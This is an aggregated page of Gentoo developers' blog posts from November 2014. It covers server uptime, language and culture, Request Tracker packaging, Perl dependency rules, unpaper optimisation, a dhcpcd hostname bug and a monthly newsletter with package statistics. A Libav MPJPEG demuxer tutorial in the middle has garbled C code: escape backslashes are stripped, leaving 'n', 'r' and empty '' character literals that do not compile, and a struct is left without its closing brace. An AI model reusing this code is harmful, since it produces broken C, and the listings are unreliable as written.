Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
November 20, 2014, 20:22 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

November 20, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
RIP ns2 (November 20, 2014, 12:39 UTC)

Today we did shutdown our now oldest running Gentoo Linux production server : ns2.

Obviously this machine was happily spreading our DNS records around the world but what’s remarkable about it is that it has been doing so for 2717 straight days !

$ uptime
 13:00:45 up 2717 days,  2:20,  1 user,  load average: 0.13, 0.04, 0.01

As I mentioned when we did shutdown stabber, our beloved firewall, our company has been running Gentoo Linux servers in production for a long time now and we’re always a bit sad when we have to power off one of them.

As usual, I want to take this chance to thank everyone contributing to Gentoo Linux ! Without our collective work, none of this would have been possible.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Languages, native speakers, culture (November 20, 2014, 05:37 UTC)

People who follow me probably know already that I'm not a native English speaker. Those who don't but will read this whole post will probably notice it by the end of it, just by my style, even if I were not to say it right at the start as I did.

It's not easy for me and it's often not easy for my teammates, especially so when they are native speakers. It's too easy for the both of us to underestimate or overestimate, at the same time sometimes, how much information we're conveying with a given phrase.

Something might sounds absolutely rude in English to a native speaker, but when I was forming my thought in my head it was intended to be much softer, even kind. Or the other way around: it might be actually quite polite in English, and my interpretation of it would be, to me, much ruder. And this is neither an easy or quick problem to solve, I have been working within English-based communities for a long while – this weblog is almost ten years old! – and still to this day the confusion is not completely gone.

It's interestingly sometimes easier to interact with other non-native speakers because we realize the disconnect, but other times is even harder because one or the other is not making the right amount of effort. I find it interestingly easier to talk with speakers of other Latin languages (French, Spanish, Portuguese), as the words and expressions are close enough that it can be easy to port them over — with a colleague and friend who's a native French speaker, we got to the point where it's sometimes faster to tell the other a word in our own language, rather than trying to go to English and back again; I promised him and other friends that I'll try to learn proper French.

It is not limited to language, culture is also connected: I found that there are many connections between Italian culture and Balkan, sometimes in niches that nobody would have expected it to creep up, such as rude gestures — the "umbrella gesture" seems to work just as good for Serbs as it does for Italians. This is less obvious when interacting with people exclusively online, but it is something useful when meeting people face to face.

I can only expect that newcomers – whether they are English speakers who have never worked closely with foreigners, or people whose main language is not English and who are doing their best to communicate in this language for the first time – to have a hard time.

This is not just a matter of lacking grammar or dictionary: Languages and societal customs are often interleaved and shape each other, so not understanding very well someone else's language may also mean not understanding their society and thus their point of view, and I would argue that points of view are everything.

I will make an example, but please remember I'm clearly not a philologist so I may be misspeaking, please be gentle with me. Some months ago, I've been told that English is a sexist language. While there wasn't a formal definition or reasoning for why stating that, I've been pointed at the fact you have to use "he" or "she" when talking about a third party.

I found this funny: not only in Italian you have to do so when talking about a third party, but you have to do so when talking about a second party (you) and even about a first party (me) ­— indeed, most adjectives and verbs require a gender. And while English can cop-out with the singular "they", this does not apply to Italian as easily. You can use a generic, plural "you", but the words still need a gender — it usually become feminine to match "your persons".

Because of the need for a gender in words, it is common to assume the male gender as a "default" in Italian; some documentation, especially paperwork from the public administration, will use the equivalent of "he/she" in the form of "signore/a", but it becomes cumbersome if you're writing something longer than a bank form, as every single word needs a different suffix.

I'm not trying to defend the unfortunate common mistake to assume a male gender when talking about "the user" or any other actor in a discussion, but I think it's a generally bad idea to assume that people have a perfect understanding of the language and thus assign maliciousness when there is simple naïve ignorance, as was the case with Lennart, systemd and the male pronouns. I know I try hard to use the singular "they", and I know I fall short of it too many times.

But the main point I'm trying to get across here is that yes, it's not easy, in this world that becomes more and more small, to avoid the shocking contrast of different languages and cultures. And it can't be just one side accommodating to this, we all have to make an effort, by understanding the other side's limit, and by brokering among sides that would be talking past each other anyway.

It's not easy, and it takes time, and effort. But I think it's all worth it.

Jeremy Olexa a.k.a. darkside (homepage, bugs)
2005 Volkswagen Jetta Fuse Diagram (November 20, 2014, 03:44 UTC)

It is surprisingly hard to find this fuse diagram online. I actually had the diagram in the glove box of my car but it is cold out and I didn’t want to sit outside reading the manual. I went in trying to find the source of my rear window defroster failure and found the fuse blown and “melted” to the plastic. I broke the fuse when I removed it and then replaced it with a spare fuse. It looks like the previous owner used a 30A when it should have been 25A. Anyway, works like a charm now – ready for winter.

fuse-diagram
fuse-description
example-fuses

November 19, 2014
Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Request Tracker (November 19, 2014, 15:52 UTC)

So, I’ve kind of taken over Request Tracker (bestpractical.com).

Initially I took it because I’m interested in using RT at work to take track customer service emails. All I did at the time was bump the version and remove old, insecure versions from the tree.

However, as I’ve finally gotten around to working on getting it setup, I’ve discovered there were a lot of issues that had gone unreported.

The intention is for RT to run out of its virtual host root, like /var/www/localhost/rt-4.2.9/bin/rt and configured by /var/www/localhost/rt-4.2.9/etc/RT_SiteConfig.pm, and for it to reference any supplementary packages with ${VHOST_ROOT} as its root. However, because of a broken install process and a broken hook script used by webapp-config that didn’t happen. Further, the rt_apache.conf included by us was outdated by a few years, too, which in itself isn’t a bad thing, except that it was wrong for RT 4+.

I spent much longer than I care to admit trying to figure out why my settings weren’t sticking when I edited RT_SiteConfig.pm. I was trying to run RT under its own path rather than on a subdomain, but Set($WebPath, ‘/rt’) wasn’t doing what it should.

It also complained about not being able to write to /usr/share/webapps/rt/rt-4.2.9/data/mason_data/obj, which clearly wasn’t right.

Once I tried moving RT_SiteConfig.pm to /usr/share/webapps/rt/rt-4.2.9/etc/, and chmod and chown on ../data/mason_data/obj, everything worked as it should.

Knowing this was wrong and that it would prevent anyone using our package from having multiple installation, aka vhosts, I set out to fix it.

It was a descent into madness. Things I expected to happen did not. Things that shouldn’t have been a problem were. Much of the trouble I had circled around webapp-config and webapp.eclass.

But, I prevailed, and now you can really have multiple RT installations side-by-side. Also, I’ve added an article (wiki.gentoo.org) to our wiki with updated instructions on getting RT up and running.

Caveat: I didn’t use FastCGI, so that part may be wrong still, but mod_perl is good to go.

November 16, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

Nach mehreren Wochen downtime — primär durch mich verschuldet — ist rsync1.de.gentoo.org nun wieder online.
Wie vorher wird das komplette Repository aus einer RAM disk ausgeliefert, daher ist der Mirror relativ flott.

# rsync --list-only rsync://rsync1.de.gentoo.org/gentoo-portage/
drwxr-xr-x          3,480 2014/11/16 16:01:19 .
-rw-r--r--            121 2014/01/01 01:31:01 header.txt
-rw-r--r--          3,658 2014/08/18 21:01:02 skel.ChangeLog
-rw-r--r--          8,119 2014/08/30 12:01:02 skel.ebuild
-rw-r--r--          1,231 2014/08/18 21:01:02 skel.metadata.xml
drwxr-xr-x            860 2014/11/16 16:01:02 app-accessibility
drwxr-xr-x          4,800 2014/11/16 16:01:03 app-admin
drwxr-xr-x            100 2014/11/16 16:01:03 app-antivirus
[..]
drwxr-xr-x          1,240 2014/11/16 16:01:21 x11-wm
drwxr-xr-x            340 2014/11/16 16:01:21 xfce-base
drwxr-xr-x          1,340 2014/11/16 16:01:21 xfce-extra

Die Hardware darunter ist gesponsort von Manitu.

Introducing Gambit to Gentoo (November 16, 2014, 14:50 UTC)

Hi!

I would like to introduce you to Gambit, a rather young Qt-based chess UI with excellent usability and its very own engine.

It has been living in the betagarden overlay while maturing and just hit the Gentoo main repository.
Install through

emerge -av games-board/gambit

as usual.

November 15, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
RDepending on Perl itself (November 15, 2014, 17:36 UTC)

Writing correct dependency specifications is an art in itself. So, here's a small guide for Gentoo developers how to specify runtime dependencies on dev-lang/perl. First, the general rule.
Check the following two things: 1) is your package linking anywhere to libperl.so, 2) is your package installing any Perl modules into Perl's vendor directory (e.g., /usr/lib64/perl5/vendor_perl/5.20.1/)? If at least one of these two questions is answered with yes, you need in your dependency string a slot operator, i.e. "dev-lang/perl:=" Obviously, your ebuild will have to be EAPI=5 for that. If neither 1) nor 2) are the case, "dev-lang/perl" is enough.
Now, with eclasses. If you use perl-module.eclass or perl-app.eclass, two variables control automatic adding of dependencies. GENTOO_DEPEND_ON_PERL sets whether the eclass automatically adds a dependency on Perl, and defaults to yes in both cases. GENTOO_DEPEND_ON_PERL_SUBSLOT controls whether the slot operator ":=" is used. It defaults to yes in perl-module.eclass and to no in perl-app.eclass. (This is actually the only difference between the eclasses.) The idea behind that is that a Perl module package always installs modules into vendor_dir, while an application can have its own separate installation path for its modules or not install any modules at all.
In many cases, if a package installs Perl modules you'll need Perl at build time as well since the module build system is written in Perl. If a package links to Perl, that is obviously needed at build time too.

So, summarizing:
eclass 1) or 2) true 1) false, 2) false
none "dev-lang/perl:=" needed in RDEPEND and most likely also DEPEND "dev-lang/perl" needed in RDEPEND, maybe also in DEPEND
perl-module.eclass no need to do anything GENTOO_DEPEND_ON_PERL_SUBSLOT=no possible before inherit
perl-app.eclass GENTOO_DEPEND_ON_PERL_SUBSLOT=yes needed before inherit no need to do anything

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Making a new demuxer (November 15, 2014, 13:40 UTC)

Maxim asked me to to check a stream from a security camera that he could not decode with avconv without forcing the format to mjpeg.

Mysterious stream

Since it is served as http the first step had been checking the mime type. Time to use curl -I.

# curl -I "http://host/some.cgi?user=admin&pwd=pwd" | grep Content-Type

Interesting enough it is a multipart/x-mixed-replace

Content-Type: multipart/x-mixed-replace;boundary=object-ipcamera

Basically the cgi sends a jpeg images one after the other, we even have a (old and ugly) muxer for it!

Time to write a demuxer.

Libav demuxers

We already have some documentation on how to write a demuxer, but it is not complete so this blogpost will provide an example.

Basics

Libav code is quite object oriented: every component is a C structure containing a description of it and pointers to a set of functions and there are fixed pattern to make easier to make new code fit in.

Every major library has an all${components}.c in which the components are registered to be used. In our case we talk about libavformat so we have allformats.c.

The components are built according to CONFIG_${name}_${component} variables generated by configure. The actual code reside in the ${component} directory with a pattern such as ${name}.c or ${name}dec.c/${name}enc.c if both demuxer and muxer are available.

The code can be split in multiple files if it starts growing to an excess of 500-1000 LOCs.

Registration

We have some REGISTER_ macros that abstract some logic to make every component selectable at configure time since in Libav you can enable/disable every muxer, demuxer, codec, IO/protocol from configure.

We had already have a muxer for the format.

    REGISTER_MUXER   (MPJPEG,           mpjpeg);

Now we register both in a single line:

    REGISTER_MUXDEMUX(MPJPEG,           mpjpeg);

The all${components} files are parsed by configure to generate the appropriate Makefile and C definitions. The next run we’ll get a new
CONFIG_MPJPEG_DEMUXER variable in config.mak and config.h.

Now we can add to libavformat/Makefile a line like

OBJS-$(CONFIG_MPJPEG_DEMUXER)            += mpjpegdec.o

and put our mpjpegdec.c in libavformat and we are ready to write some code!

Demuxer structure

Usually I start putting down a skeleton file with the bare minimum:

The AVInputFormat and the core _read_probe, _read_header and _read_packet callbacks.

#include "avformat.h"

static int ${name}_read_probe(AVProbeData *p)
{
    return 0;
}

static int ${name}_read_header(AVFormatContext *s)
{
    return AVERROR(ENOSYS);
}

static int ${name}_read_packet(AVFormatContext *s, AVPacket *pkt)
{
    return AVERROR(ENOSYS);
}

AVInputFormat ff_${name}_demuxer = {
    .name           = "${name}",
    .long_name      = NULL_IF_CONFIG_SMALL("Longer ${name} description"),
    .read_probe     = ${name}_read_probe,
    .read_header    = ${name}_read_header,
    .read_packet    = ${name}_read_packet,

I make so that all the functions return a no-op value.

_read_probe

This function will be called by the av_probe_input functions, it receives some probe information in the form of a buffer. The function return a score between 0 and 100; AVPROBE_SCORE_MAX, AVPROBE_SCORE_MIME and AVPROBE_SCORE_EXTENSION are provided to make more evident what is the expected confidence. 0 means that we are sure that the probed stream is not parsable by this demuxer.

_read_header

This function will be called by avformat_open_input. It reads the initial format information (e.g. number and kind of streams) when available, in this function the initial set of streams should be mapped with avformat_new_stream. Must return 0 on success. The skeleton is made to return ENOSYS so it can be run and just exit cleanly.

_read_packet

This function will be called by av_read_frame. It should return an AVPacket containing demuxed data as contained in the bytestream. It will be parsed and collated (or splitted) to a frame-worth amount of data by the optional parsers. Must return 0 on success. The skeleton again returns ENOSYS.

Implementation

Now let’s implement the mpjpeg support! The format in itself is quite simple:
- a boundary line starting with --
- a Content-Type line stating image/jpeg.
- a Content-Length line with the actual buffer length.
- the jpeg data

Probe function

We just want to check if the Content-Type is what we expect basically, so we just
go over the lines (\n\r-separated) and check if there is a tag Content-Type with a value image/jpeg.

static int get_line(AVIOContext *pb, char *line, int line_size)
{
    int i, ch;
    char *q = line;

    for (i = 0; !pb->eof_reached; i++) {
        ch = avio_r8(pb);
        if (ch == 'n') {
            if (q > line && q[-1] == 'r')
                q--;
            *q = '';

            return 0;
        } else {
            if ((q - line) < line_size - 1)
                *q++ = ch;
        }
    }

    if (pb->error)
        return pb->error;
    return AVERROR_EOF;
}

static int split_tag_value(char **tag, char **value, char *line)
{
    char *p = line;

    while (*p != '' && *p != ':')
        p++;
    if (*p != ':')
        return AVERROR_INVALIDDATA;

    *p   = '';
    *tag = line;

    p++;

    while (av_isspace(*p))
        p++;

    *value = p;

    return 0;
}

static int check_content_type(char *line)
{
    char *tag, *value;
    int ret = split_tag_value(&tag, &value, line);

    if (ret < 0)
        return ret;

    if (av_strcasecmp(tag, "Content-type") ||
        av_strcasecmp(value, "image/jpeg"))
        return AVERROR_INVALIDDATA;

    return 0;
}

static int mpjpeg_read_probe(AVProbeData *p)
{
    AVIOContext *pb;
    char line[128] = { 0 };
    int ret;

    pb = avio_alloc_context(p->buf, p->buf_size, 0, NULL, NULL, NULL, NULL);
    if (!pb)
        return AVERROR(ENOMEM);

    while (!pb->eof_reached) {
        ret = get_line(pb, line, sizeof(line));
        if (ret < 0)
            break;

        ret = check_content_type(line);
        if (!ret)
            return AVPROBE_SCORE_MAX;
    }

    return 0;
}

Here we are using avio to be able to reuse get_line later.

Reading the header

The format is pretty much header-less, we just check for the boundary for now and
set up the minimum amount of information regarding the stream: media type, codec id and frame rate. The boundary by specification is less than 70 characters with -- as initial marker.

static int mpjpeg_read_header(AVFormatContext *s)
{
    MPJpegContext *mp = s->priv_data;
    AVStream *st;
    char boundary[70 + 2 + 1];
    int ret;

    ret = get_line(s->pb, boundary, sizeof(boundary));
    if (ret < 0)
        return ret;

    if (strncmp(boundary, "--", 2))
        return AVERROR_INVALIDDATA;

    st = avformat_new_stream(s, NULL);

    st->codec->codec_type = AVMEDIA_TYPE_VIDEO;
    st->codec->codec_id   = AV_CODEC_ID_MJPEG;

    avpriv_set_pts_info(st, 60, 1, 25);

    return 0;
}

Reading packets

Even this function is quite simple, please note that AVFormatContext provides an
AVIOContext. The bulk of the function boils down to reading the size of the frame,
allocate a packet using av_new_packet and write down if using avio_read.

static int parse_content_length(char *line)
{
    char *tag, *value;
    int ret = split_tag_value(&tag, &value, line);
    long int val;

    if (ret < 0)
        return ret;

    if (av_strcasecmp(tag, "Content-Length"))
        return AVERROR_INVALIDDATA;

    val = strtol(value, NULL, 10);
    if (val == LONG_MIN || val == LONG_MAX)
        return AVERROR(errno);
    if (val > INT_MAX)
        return AVERROR(ERANGE);
    return val;
}

static int mpjpeg_read_packet(AVFormatContext *s, AVPacket *pkt)
{
    char line[128];
    int ret, size;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        return ret;

    ret = check_content_type(line);
    if (ret < 0)
        return ret;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        return ret;

    size = parse_content_length(line);
    if (size < 0)
        return size;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    ret = av_new_packet(pkt, size);
    if (ret < 0)
        return ret;

    ret = avio_read(s->pb, pkt->data, size);
    if (ret < 0)
        goto fail;

    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    // Consume the boundary marker
    ret = get_line(s->pb, line, sizeof(line));
    if (ret < 0)
        goto fail;

    return ret;

fail:
    av_free_packet(pkt);
    return ret;
}

What next

For now I walked you through on the fundamentals, hopefully next week I’ll show you some additional features I’ll need to implement in this simple demuxer to make it land in Libav: AVOptions to make possible overriding the framerate and some additional code to be able to do without Content-Length and just use the boundary line.

PS: wordpress support for syntax highlight is quite subpar, if somebody has a blog engine that can use pygments or equivalent please tell me and I’d switch to it.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Small differences don't matter (to unpaper) (November 15, 2014, 04:53 UTC)

After my challenge with the fused multiply-add instructions I managed to find some time to write a new test utility. It's written ad hoc for unpaper but it can probably be used for other things too. It's trivial and stupid but it got the job done.

What it does is simple: it loads both a golden and a result image files, compares the size and format, and then goes through all the bytes to identify how many differences are there between them. If less than 0.1% of the image surface changed, it consider the test a pass.

It's not a particularly nice system, especially as it requires me to bundle some 180MB of golden files (they compress to just about 10 MB so it's not a big deal), but it's a strict improvement compared to what I had before, which is good.

This change actually allowed me to explore one change that I abandoned before because it resulted in non-pixel-perfect results. In particular, unpaper now uses single-precision floating points all over, rather than doubles. This is because the slight imperfection caused by this change are not relevant enough to warrant the ever-so-slight loss in performance due to the bigger variables.

But even up to here, there is very little gain in performance. Sure some calculation can be faster this way, but we're still using the same set of AVX/FMA instructions. This is unfortunate, unless you start rewriting the algorithms used for searching for edges or rotations, there is no gain to be made by changing the size of the code. When I converted unpaper to use libavcodec, I decided to make the code simple and as stupid as I could make it, as that meant I could have a baseline to improve from, but I'm not sure what the best way to improve it is, now.

I still have a branch that uses OpenMP for the processing, but since most of the filters applied are dependent on each other it does not work very well. Per-row processing gets slightly better results but they are really minimal as well. I think the most interesting parallel processing low-hanging fruit would be to execute processing in parallel on the two pages after splitting them from a single sheet of paper. Unfortunately, the loops used to do that processing right now are so complicated that I'm not looking forward to touch them for a long while.

I tried some basic profile-guided optimization execution, just to figure out what needs to be improved, and compared with codiff a proper release and a PGO version trained after the tests. Unfortunately the results are a bit vague and it means I'll probably have to profile it properly if I want to get data out of it. If you're curious here is the output when using rbelf-size -D on the unpaper binary when built normally, with profile-guided optimisation, with link-time optimisation, and with both profile-guided and link-time optimisation:

% rbelf-size -D ../release/unpaper ../release-pgo/unpaper ../release-lto/unpaper ../release-lto-pgo/unpaper
    exec         data       rodata        relro          bss     overhead    allocated   filename
   34951         1396        22284            0        11072         3196        72899   ../release/unpaper
   +5648         +312         -192           +0         +160           -6        +5922   ../release-pgo/unpaper
    -272           +0        -1364           +0         +144          -55        -1547   ../release-lto/unpaper
   +7424         +448        -1596           +0         +304          -61        +6519   ../release-lto-pgo/unpaper

It's unfortunate that GCC does not give you any diagnostic on what it's trying to do achieve when doing LTO, it would be interesting to see if you could steer the compiler to produce better code without it as well.

Anyway, enough with the microptimisations for now. If you want to make unpaper faster, feel free to send me pull requests for it, I'll be glad to take a look at them!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Having fun with networking (November 15, 2014, 04:14 UTC)

Since the last minor upgrade my notebook has been misbehaving in funny ways.
I presumed that it was NetworkManager being itself, but ... this is even more fun. To quote from the manpage:

If the hostname is currently blank, (null) or localhost, or force_hostname is YES or TRUE or 1 then dhcpcd
     sets the hostname to the one supplied by the DHCP server.
Guess what. Now my hostname is 192.168.0.7, I mean 192.168.0.192.168.0.7, err...
And as a bonus this even breaks X in funny ways so that starting new apps becomes impossible. The fix?
Now the hostname is set to "localhorst". Because that's the name of the machine!111 (It doesn't have an explicit name, so localhost used to be ok)

November 14, 2014
Gentoo Monthly Newsletter: October 2014 (November 14, 2014, 19:30 UTC)

Gentoo News

Council News

The council addressed a number of issues this month. The change with the biggest long-term significance was clearing the way to proceed with the git migration once infra is ready. This included removing changelogs from future git commits, removing cvs headers, and simplifying our news repository format. The infra and git migration projects will coordinate the actual migration hopefully in the not-so-distant future.

The council also endorsed getting rid of herds, but acknowledged that there are some details that need to be worked out before pulling the plug. The bikeshedding was moved back to the lists so all could share in the fun.

There are still some concerns with the games team. The council decided to give the team more time to sort things out internally before interfering. It was acknowledged that most of the serious issues were already resolved with the decision to allow anybody to elect to make their packages a part of the games herd or not. Some QA concerns with some games were brought up, but it was felt that this is best dealt with on a per-package basis with QA/treecleaners and that games shouldn’t receive any special treatment one way or the other.

Other decisions include removing einstall from EAPI6, and approving GLEP64 (VDB caching / API). There was also a status update on multilib (nearly done), and migrating project pages to the wiki (sadly we can’t just get rid of unmigrated projects like the x86 and amd64 arches).

PYTHON_SINGLE_TARGETS updates

(by Ian Stakenvicius)

On November 7th, packages inheriting python-single-r1 got a whole lot easier for end-users to manage.

It used to be that any package supporting just one Python required it to have a python_single_target_* USE-flag set to choose it, even if the package was only compatible with one Python in the first place. Since November 7th, if a package is only compatible with a single supported Python version (say, python-2.7), then it no longer uses python_single_target_* use flags and relies instead on that implementation being enabled in PYTHON_TARGETS.

The most visible change seen from this is package rebuilds from removal of a lot of PYTHON_SINGLE_TARGET flags, especially on python-2.7-only packages. However, the removal of these flags also means that setting PYTHON_SINGLE_TARGET to something other than python2_7 no longer needs all of those packages to be listed in package.use.

Portage users are also likely to notice that exceptions to PYTHON_SINGLE_TARGET that would require package.use changes are now also be calculated properly by –autounmask, instead of solely being reported as an illegible REQUIRED_USE error.

Gentoo Developer Moves

Summary

Gentoo is made up of 243 active developers, of which 39 are currently away.
Gentoo has recruited a total of 804 developers since its inception.

Changes

  • Yixun Lan joined the electronics team

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 163
Packages 17876
Ebuilds 38009
Architecture Stable Testing Total % of Packages
alpha 3663 592 4255 23.80%
amd64 10926 6462 17388 97.27%
amd64-fbsd 0 1580 1580 8.84%
arm 2709 1812 4521 25.29%
arm64 565 46 611 3.42%
hppa 3103 502 3605 20.17%
ia64 3218 629 3847 21.52%
m68k 624 99 723 4.04%
mips 0 2423 2423 13.55%
ppc 6869 2479 9348 52.29%
ppc64 4381 988 5369 30.03%
s390 1445 376 1821 10.19%
sh 1625 461 2086 11.67%
sparc 4160 921 5081 28.42%
sparc-fbsd 0 319 319 1.78%
x86 11576 5402 16978 94.98%
x86-fbsd 0 3245 3245 18.15%

gmn-portage-stats-2014-11

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201410-02 perl-core/Locale-Maketext (and 1 more) Perl, Perl Locale-Maketext module: Multiple vulnerabilities 446376
201410-01 app-shells/bash Bash: Multiple vulnerabilities 523742

Package Removals/Additions

Removals

Package Developer Date
media-sound/cowbell k_f 06 Oct 2014
x11-plugins/msn-pecan voyageur 08 Oct 2014
x11-plugins/pidgin-facebookchat voyageur 08 Oct 2014
dev-perl/IO-Socket-IP dilfridge 11 Oct 2014
dev-perl/Template-Latex dilfridge 13 Oct 2014
app-emulation/emul-linux-x86-compat ulm 14 Oct 2014
app-doc/djbdns-man mjo 15 Oct 2014
app-text/unix2dos mjo 18 Oct 2014
app-text/regex idella4 29 Oct 2014
games-board/chessdb mr_bones_ 30 Oct 2014
dev-ml/async_core aballier 30 Oct 2014

Additions

Package Developer Date
net-analyzer/openvas-tools jlec 01 Oct 2014
net-p2p/bitcoin-cli blueness 02 Oct 2014
app-benchmarks/wrk vikraman 02 Oct 2014
dev-perl/Net-IPv4Addr mjo 04 Oct 2014
dev-ruby/compass-core graaff 05 Oct 2014
dev-ruby/compass-import-once graaff 05 Oct 2014
media-sound/apulse jauhien 05 Oct 2014
dev-perl/Test-Warnings zlogene 05 Oct 2014
x11-misc/rofi jer 06 Oct 2014
dev-python/parse alunduil 06 Oct 2014
dev-python/clint alunduil 07 Oct 2014
app-admin/lastpass robbat2 08 Oct 2014
dev-perl/XML-Entities dilfridge 09 Oct 2014
dev-python/Numdifftools jlec 10 Oct 2014
app-text/krop dilfridge 10 Oct 2014
net-voip/vidyodesktop prometheanfire 10 Oct 2014
kde-misc/kcm-touchpad mrueg 11 Oct 2014
dev-perl/Unicode-Normalize dilfridge 11 Oct 2014
dev-perl/Net-IDN-Encode dilfridge 11 Oct 2014
dev-perl/tkispell dilfridge 11 Oct 2014
perl-core/IO-Socket-IP dilfridge 11 Oct 2014
virtual/perl-IO-Socket-IP dilfridge 11 Oct 2014
dev-python/pyhamcrest alunduil 11 Oct 2014
dev-python/enum34 alunduil 11 Oct 2014
dev-db/postgresql titanofold 11 Oct 2014
dev-python/doublex alunduil 11 Oct 2014
dev-python/pycallgraph alunduil 12 Oct 2014
dev-python/python-termstyle alunduil 12 Oct 2014
dev-python/rednose alunduil 12 Oct 2014
dev-python/PyQt5 pesa 13 Oct 2014
net-analyzer/ipguard jer 13 Oct 2014
dev-perl/Template-Plugin-Latex dilfridge 13 Oct 2014
dev-perl/LaTeX-Driver dilfridge 14 Oct 2014
dev-perl/Pod-LaTeX dilfridge 14 Oct 2014
dev-perl/LaTeX-Encode dilfridge 14 Oct 2014
dev-perl/MooseX-FollowPBP dilfridge 14 Oct 2014
dev-perl/LaTeX-Table dilfridge 14 Oct 2014
virtual/perl-Term-ReadLine dilfridge 14 Oct 2014
dev-python/python-etcd zmedico 15 Oct 2014
dev-db/etcd zmedico 15 Oct 2014
dev-libs/extra-cmake-modules kensington 15 Oct 2014
kde-frameworks/kglobalaccel kensington 15 Oct 2014
kde-frameworks/kwallet kensington 15 Oct 2014
kde-frameworks/kjobwidgets kensington 15 Oct 2014
kde-frameworks/kxmlgui kensington 15 Oct 2014
kde-frameworks/plasma kensington 15 Oct 2014
kde-frameworks/kcrash kensington 15 Oct 2014
kde-frameworks/kdesignerplugin kensington 15 Oct 2014
kde-frameworks/frameworkintegration kensington 15 Oct 2014
kde-frameworks/kf-env kensington 15 Oct 2014
kde-frameworks/kdesu kensington 15 Oct 2014
kde-frameworks/ki18n kensington 15 Oct 2014
kde-frameworks/kitemmodels kensington 15 Oct 2014
kde-frameworks/kguiaddons kensington 15 Oct 2014
kde-frameworks/knewstuff kensington 15 Oct 2014
kde-frameworks/kcoreaddons kensington 15 Oct 2014
kde-frameworks/kapidox kensington 15 Oct 2014
kde-frameworks/kactivities kensington 15 Oct 2014
kde-frameworks/kdelibs4support kensington 15 Oct 2014
kde-frameworks/kcmutils kensington 15 Oct 2014
kde-frameworks/sonnet kensington 15 Oct 2014
kde-frameworks/kconfig kensington 15 Oct 2014
kde-frameworks/kidletime kensington 15 Oct 2014
kde-frameworks/kunitconversion kensington 15 Oct 2014
kde-frameworks/kio kensington 15 Oct 2014
kde-frameworks/kdbusaddons kensington 15 Oct 2014
kde-frameworks/kconfigwidgets kensington 15 Oct 2014
kde-frameworks/kauth kensington 15 Oct 2014
kde-frameworks/kcompletion kensington 15 Oct 2014
kde-frameworks/kcodecs kensington 15 Oct 2014
kde-frameworks/kpty kensington 15 Oct 2014
kde-frameworks/solid kensington 15 Oct 2014
kde-frameworks/kplotting kensington 15 Oct 2014
kde-frameworks/kbookmarks kensington 15 Oct 2014
kde-frameworks/knotifyconfig kensington 15 Oct 2014
kde-frameworks/kemoticons kensington 15 Oct 2014
kde-frameworks/kinit kensington 15 Oct 2014
kde-frameworks/kross kensington 15 Oct 2014
kde-frameworks/kwidgetsaddons kensington 15 Oct 2014
kde-frameworks/kimageformats kensington 15 Oct 2014
kde-frameworks/kdewebkit kensington 15 Oct 2014
kde-frameworks/kdeclarative kensington 15 Oct 2014
kde-frameworks/attica kensington 15 Oct 2014
kde-frameworks/kservice kensington 15 Oct 2014
kde-frameworks/kiconthemes kensington 15 Oct 2014
kde-frameworks/kdnssd kensington 15 Oct 2014
kde-frameworks/kmediaplayer kensington 15 Oct 2014
kde-frameworks/knotifications kensington 15 Oct 2014
kde-frameworks/kded kensington 15 Oct 2014
kde-frameworks/kjsembed kensington 15 Oct 2014
kde-frameworks/kjs kensington 15 Oct 2014
